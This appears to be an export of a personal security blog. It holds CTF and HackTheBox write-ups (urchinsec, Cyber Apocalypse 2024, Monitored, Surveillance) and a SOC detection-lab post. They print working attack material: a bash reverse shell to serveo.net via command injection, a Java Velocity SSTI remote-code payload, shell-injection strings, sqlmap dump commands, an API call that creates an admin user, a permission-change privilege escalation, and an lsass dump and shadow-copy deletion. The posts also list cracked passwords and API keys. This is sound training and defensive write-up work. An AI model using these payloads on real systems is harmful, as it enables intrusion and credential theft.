SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n 
SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x 
SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ 
SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. 
You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. 
Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. 
From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. 
When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) #set($bufferedReaderClass=$stringClass.forName(\u0026#34;java.io.BufferedReader\u0026#34;)) #set($collectorsClass=$stringClass.forName(\u0026#34;java.util.stream.Collectors\u0026#34;)) #set($systemClass=$stringClass.forName(\u0026#34;java.lang.System\u0026#34;)) #set($stringBuilderConstructor=$stringBuilderClass.getConstructor()) #set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass)) #set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass)) 
#set($runtime=$stringClass.forName(\u0026#34;java.lang.Runtime\u0026#34;).getRuntime()) #set($process=$runtime.exec(\u0026#34;cat ../flag2023911480.txt\u0026#34;)) #set($null=$process.waitFor() ) #set($inputStream=$process.getInputStream()) #set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream)) #set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader)) #set($stringBuilder=$stringBuilderConstructor.newInstance()) #set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator()))) $output Just use the payload in the browser and capture the request in burp.\nflag : HTB{f13ry_t3mpl4t35_fr0m_th3_d3pth5!!}\nLocktalk rating: medium\nThis is where things got interesting.\nHere you are given a webapplication with an api blueprint.\nThe api had three routes:\n1 2 3 4 5 /flag protected by middleware /chat/\u0026lt;int:chat_id\u0026gt; protected by middleware /get_ticket open but blocked by ha proxy A quick look at the proxy configuration\n1 2 3 4 5 frontend haproxy bind 0.0.0.0:1337 default_backend backend http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } So we had to find a way to bypass this. I used a lot of time on this part. Until i found this \u0026raquo; here\nTo make your search easier you had to find the ha proxy version from the dockerfile : PS i had forgotten do thsi , it could have made my work easier.\n1 2 3 4 5 6 WORKDIR /tmp RUN wget https://www.haproxy.org/download/2.8/src/haproxy-2.8.1.tar.gz \u0026amp;\u0026amp; \\ tar zxvf haproxy-*.tar.gz \u0026amp;\u0026amp; cd haproxy-* \u0026amp;\u0026amp; \\ make TARGET=linux-musl \u0026amp;\u0026amp; \\ make install RUN rm -rf * From the article if we make a request to /api/v1/get_ticket we get denied but if we make request to /api/v1/get_ticket# we bypass the acl.\nFrom here i gotr the jwt token. I tries common methos of exploiting jwt but none of them worked. 
UNtil i searched for a vulnerability in python_jwt==3.3.3 from the requirements.txt\nI found this vulnerability that enables us to bypass the jwt verification \u0026raquo; here and for the exploit \u0026raquo; here\nWe change our role to administrator and then read the flag\nflag: HTB{h4Pr0Xy_n3v3r_D1s@pp01n4s}\nTestimonial Here we are given a webapplication that accepts parameters customer and testimonial.\nIt is a go webapplication witha grpc endpoint. I saw some people asking on the discord why there were two ip addresses. One if for the main webapp and one was for grpc. Read more about grpc \u0026raquo; here\nIve encountered with grpc before. So the tools we will need are grpcurl and grpcui. In this context grpcui will not work.\n1 grpcurl -plaintext -import-path ./ -proto ptypes.proto -d \u0026#39;{\u0026#34;customer\u0026#34;: \u0026#34;examplecusomer\u0026#34;, \u0026#34;testimonial\u0026#34;: \u0026#34;exampletestimonial\u0026#34;}\u0026#39; 94.237.59.119:45387 RickyService.SubmitTestimonial Above is the format for grpcurl. Breakdown:\nptypes.proto file is in the pb folder . This is used to enable grpcurl to interact with the server since service enumaration was disables . 
This is what caused grpcui not to work.\nThe service and method name can be found in the source code.\nUsing this will also enable you to bypass the filter that was placed in the code\n1 2 3 for _, char := range []string{\u0026#34;/\u0026#34;, \u0026#34;\\\\\u0026#34;, \u0026#34;:\u0026#34;, \u0026#34;*\u0026#34;, \u0026#34;?\u0026#34;, \u0026#34;\\\u0026#34;\u0026#34;, \u0026#34;\u0026lt;\u0026#34;, \u0026#34;\u0026gt;\u0026#34;, \u0026#34;|\u0026#34;, \u0026#34;.\u0026#34;} { customer = strings.ReplaceAll(customer, char, \u0026#34;\u0026#34;) } NOTE: Beyond this point i did after the ctf , i did not solve this one.\nOfficial writeup \u0026raquo; https://github.com/hackthebox/cyber-apocalypse-2024/tree/main/web/%5BEasy%5D%20Testimonial\n","date":"2024-03-11T13:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/ca2024.png","permalink":"https://f0rk3b0mb.github.io/p/htb_cyberapocalypse_2024/","title":"HTB_cyberapocalypse_2024"},{"content":"HTB monitored Writeup for HTB monitored box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 08:28 EAT Warning: 10.10.11.248 giving up on port because retransmission cap hit (6). Nmap scan report for monitored.htb (10.10.11.248) Host is up (0.36s latency). 
Not shown: 988 closed ports PORT STATE SERVICE VERSION 68/udp open|filtered dhcpc 123/udp open ntp NTP v4 (unsynchronized) | ntp-info: |_ 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 6f3fa7421af94c6500000000 | snmpEngineBoots: 35 |_ snmpEngineTime: 48m05s | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:389 0.0.0.0:0 | TCP 127.0.0.1:25 0.0.0.0:0 |_ UDP 0.0.0.0:68 *:* | snmp-processes: | 1: | | 2: | |_ 3: | snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64 |_ System uptime: 48m5.77s (288577 timeticks) |_snmp-win32-software: 162/udp open snmp net-snmp; net-snmp SNMPv3 server | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: 5a44ab2146ff4c6500000000 | snmpEngineBoots: 26 |_ snmpEngineTime: 48m05s 1100/udp open|filtered mctp 1813/udp open|filtered radacct 3130/udp open|filtered squid-ipc 19500/udp open|filtered unknown 22053/udp open|filtered unknown 27444/udp open|filtered Trinoo_Bcast 44190/udp open|filtered unknown 49259/udp open|filtered unknown Service Info: Host: monitored Host script results: |_clock-skew: 10s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 1302.38 seconds Snmp enumeration\n1 snmpwalk -v1 -c public monitored.htb we get creds for username: svc pass: XjH7VCehowpR1xZB\nMaking a post request to /api/v1/authenticate we get access token that we can use to login\n1 2 https://nagios.monitored.htb/nagiosxi/index.php?token=1562fdd66ece5a71f970399218ab842b6c8674c0 this nagios is vulnerable to sql injection \u0026raquo; see here\n1 sqlmap -u \u0026#34;https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php\u0026#34; --data=\u0026#34;id=3\u0026amp;action=acknowledge_banner_message\u0026#34; --cookie \u0026#34;nagiosxi=40ka0uvgngmjev8i267hq2qt9p\u0026#34; --dbms=MySQL --level=1 --risk=1 -D nagiosxi -T xi_users --dump Dumping the db enables us to get an admin api key : IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL\nWe can now create our owm user with full privilldeges\n1 curl -XPOST -k \u0026#34;https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK\u0026amp;pretty=1\u0026#34; -d \u0026#34;username=test\u0026amp;password=test\u0026amp;name=test\u0026amp;email=test@test.com\u0026amp;auth_level=admin\u0026#34; Uploads a reverse shell by creating a command and checking it\nuser.txt 5428c0b228e51f2428525f3faa3fcca2\nTo escalate privilldges we modify the setuid binary npcd\nroot.txt 9893d1d8c72bc11111a49fcb508ac07a\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_monitored/","title":"Htb_monitored"},{"content":"HTB surveillance Writeup for htb surveillnace box\nrated: medium category: web\nNmap Scan\n1 2 3 4 5 6 7 8 9 10 11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:38 EAT Nmap scan report for 10.10.11.245 Host is up (0.30s latency). 
Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds A cms is running in port 80 , craft cms\nIt is vulnerable to rce CVE-2023-41892\nThere are 2 :\nmatthew zoneminder Further enumartion we get a backup file surveillance\u0026ndash;2023-10-17-202801\u0026ndash;v4.4.14.sql.zip. It has a sql backup of the database , here we get creds for the user matthew.\nuser.txt 260ecc03cedb8e78d80a6658b5b22eac\nWe also get the creda for zoneminder in the ZoneMinder config files password : ZoneMinderPassword2023\nZoneminder is a service running on port 8080, So we tunnel using ssh to access it.\nIt is vulnerable to rce CVE-2023-26035\nTo escalate priviledges and read root flag\n1 sudo /usr/bin/zmupdate.pl -v 1.19.0 -u \u0026#34;;cat /root/root.txt;\u0026#34; root.txt 13630834b0c9c6f122557097788d8e25\n","date":"2024-02-28T22:44:28+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb_surveillance/","title":"Htb_surveillance"},{"content":"SOC Lab Setup Introduction This is my documentation of a lab setup for a SOC (Security operation center) environment. I decided to pursue this project with the aim of learning about endpoint detection and response. SOC analysis is more about blue teaming and detecting threats in an environment.\nAs is did this i followed steps from this blog post \u0026raquo; here . 
Credits!!\nSummary Setup Intrusion Blocking attacks Tuning False Positives Setup Setup of vms(ubuntu server and windows) NOTE: im using a computer with the following specs:\n8gb RAM intel i5 500gb hard disk You might want to allocate different amount of resources for your vms depending on the specs of your hardware. As for me my specs constrained me , my vms were slow esp the windows vm. I allocated 2gb for the windows vm and 1gb for the ubuntu server.\nInstalling of limacharlie sensor LimaCharlie is a very powerful “SecOps Cloud Platform” . Check it out \u0026raquo; here\nC2 (command and control) For the C2 i used sliver-server by bishop fox\n1 Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing I created a C2 payload and dropped it in the windows vm.\nUsing the implant we can access the windows vm from the ubuntu server attack machine.\nBelow is a list of running processes\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 . 
├── [0] [System Process] │ └── [4] System │ ├── [1444] Memory Compression │ ├── [72] Registry │ └── [528] smss.exe ├── [632] csrss.exe ├── [732] csrss.exe ├── [776] wininit.exe │ ├── [864] services.exe │ │ ├── [2160] Sysmon64.exe │ │ ├── [3708] svchost.exe │ │ ├── [1348] svchost.exe │ │ ├── [1508] svchost.exe │ │ ├── [1668] svchost.exe │ │ │ └── [5768] audiodg.exe │ │ ├── [2152] vm3dservice.exe │ │ │ └── [2284] vm3dservice.exe │ │ ├── [1128] svchost.exe │ │ │ ├── [648] taskhostw.exe │ │ │ ├── [1960] sihost.exe │ │ │ ├── [2436] CompatTelRunner.exe │ │ │ │ ├── [2488] conhost.exe │ │ │ │ └── [1236] CompatTelRunner.exe │ │ │ ├── [2520] MicrosoftEdgeUpdate.exe │ │ │ └── [3460] taskhostw.exe │ │ ├── [2124] vmtoolsd.exe │ │ ├── [4368] svchost.exe │ │ ├── [3500] SecurityHealthService.exe │ │ ├── [6548] svchost.exe │ │ ├── [1636] svchost.exe │ │ ├── [1772] svchost.exe │ │ ├── [1788] svchost.exe │ │ ├── [3100] SgrmBroker.exe │ │ ├── [1304] svchost.exe │ │ ├── [2168] VGAuthService.exe │ │ ├── [2132] rphcp.exe │ │ ├── [628] svchost.exe │ │ ├── [896] spoolsv.exe │ │ ├── [992] svchost.exe │ │ │ ├── [1284] ShellExperienceHost.exe │ │ │ ├── [1580] RuntimeBroker.exe │ │ │ ├── [3240] BackgroundTransferHost.exe │ │ │ ├── [4376] backgroundTaskHost.exe │ │ │ ├── [5572] RuntimeBroker.exe │ │ │ ├── [740] unsecapp.exe │ │ │ ├── [1156] dllhost.exe │ │ │ ├── [5608] SearchApp.exe │ │ │ ├── [6004] RuntimeBroker.exe │ │ │ ├── [4352] RuntimeBroker.exe │ │ │ ├── [2476] WmiPrvSE.exe │ │ │ ├── [3680] WmiPrvSE.exe │ │ │ ├── [3892] TextInputHost.exe │ │ │ ├── [3932] StartMenuExperienceHost.exe │ │ │ ├── [4488] MoUsoCoreWorker.exe │ │ │ ├── [1256] RuntimeBroker.exe │ │ │ ├── [3552] smartscreen.exe │ │ │ ├── [5064] SearchApp.exe │ │ │ └── [1216] TiWorker.exe │ │ ├── [2984] dllhost.exe │ │ ├── [2092] TrustedInstaller.exe │ │ ├── [2376] svchost.exe │ │ ├── [3912] SearchIndexer.exe │ │ ├── [5652] svchost.exe │ │ ├── [1172] svchost.exe │ │ │ ├── [3152] ctfmon.exe │ │ │ └── [4800] CompatTelRunner.exe │ │ │ 
└── [2944] conhost.exe │ │ ├── [1520] svchost.exe │ │ ├── [1532] svchost.exe │ │ ├── [1832] msdtc.exe │ │ ├── [736] svchost.exe │ │ ├── [4852] sppsvc.exe │ │ ├── [5172] svchost.exe │ │ ├── [1292] svchost.exe │ │ ├── [1628] svchost.exe │ │ ├── [1640] svchost.exe │ │ └── [2120] svchost.exe │ ├── [876] lsass.exe │ └── [1016] fontdrvhost.exe ├── [784] winlogon.exe │ ├── [1008] fontdrvhost.exe │ └── [1040] dwm.exe ├── [3328] explorer.exe │ ├── [3512] SecurityHealthSystray.exe │ ├── [3880] vmtoolsd.exe │ ├── [4272] OneDrive.exe │ └── [6984] cmd.exe │ ├── [1696] CONTINUED_CARRY.exe │ └── [3612] conhost.exe ├── [6808] setup.exe │ ├── [7032] setup.exe │ └── [3008] MicrosoftEdgeUpdate.exe └── [6952] Microsoft.SharePoint.exe ⚠️ Security Product(s): Sysmon64, Windows Smart Screen Inturn we can observe the malware in the limacharlie telementery. We can detect our maliciuos process apart from the the legitimate processes. we can also view it network connections.\nIntrusion I can steal creds by dumping lsass.exe from the windows box memory to my attack machine\nThis will generate telementery in limacharkie that we can search with \u0026ldquo;SENSITIVE_PROCESS_ACCESS\u0026rdquo;\nWe can create an edr rule to alert once this type of activity occurs\n1 2 3 4 event: SENSITIVE_PROCESS_ACCESS op: ends with path: event/*/TARGET/FILE_PATH value: lsass.exe This rule will detect \u0026ldquo;SENSITIVE_PROCEE_ACCESS\u0026rdquo; with process being \u0026ldquo;lsass.exe\u0026rdquo;\nTo respond we use:\n1 2 - action: report name: LSASS access This will generate a detection report that we can view in the detections menu.\nBlocking attacks Here we are going to craft rules to take action when detections are made\nin thbis i ran thsi command :\n1 vssadmin delete shadows /all Which will delete volume shadow copies. 
